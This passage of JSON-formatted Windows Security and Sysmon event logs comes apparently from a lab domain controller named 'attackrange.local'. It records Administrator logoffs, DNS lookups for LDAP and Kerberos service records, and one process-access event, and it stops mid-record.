C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.437","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"992","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220377,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x478FE\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x478fe","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220378,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x46B8A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x46b8a","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220379,"ProcessID":864,"ThreadID":992,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4A252\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4a252","LogonType":"3","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2551,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.652\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.652","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2552,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.653\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-881393.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.653","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  2 win-dc-881393.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2553,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.653\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.653","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2554,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.654\r\nProcessGuid: {A837DB8D-01C5-5F25-0000-001014BB0200}\r\nProcessId: 2688\r\nQueryName: attackrange.local\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\dns.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.654","ProcessGuid":"{A837DB8D-01C5-5F25-0000-001014BB0200}","QueryName":"attackrange.local","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\dns.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2555,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.655\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-881393.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.655","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-881393.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2556,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.656\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.656","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2557,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.657\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.657","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2558,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.667\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.pdc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.667","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.pdc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2559,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.668\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  2 win-dc-881393.attackrange.local;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.668","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  2 win-dc-881393.attackrange.local;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2560,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.668\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nProcessId: 1332\r\nQueryName: us-east-2.compute.internal\r\nQueryStatus: 9501\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.668","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","QueryName":"us-east-2.compute.internal","QueryStatus":"9501","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2561,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.668\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.668","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2562,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.671\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.671","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2563,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.673\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.673","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2564,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.678\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.69d51312-c36a-4a0a-a22e-cc2640ee63af.domains._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.678","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.69d51312-c36a-4a0a-a22e-cc2640ee63af.domains._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2565,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.680\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: gc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.680","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"gc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2566,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.683\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: 03069c6e-caa5-4a1a-840e-b9aff275de85._msdcs.attackrange.local.\r\nQueryStatus: 0\r\nQueryResults: type:  5 win-dc-881393.attackrange.local;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.683","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"03069c6e-caa5-4a1a-840e-b9aff275de85._msdcs.attackrange.local.","QueryStatus":"0","QueryResults":"type:  5 win-dc-881393.attackrange.local;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2567,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.688\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 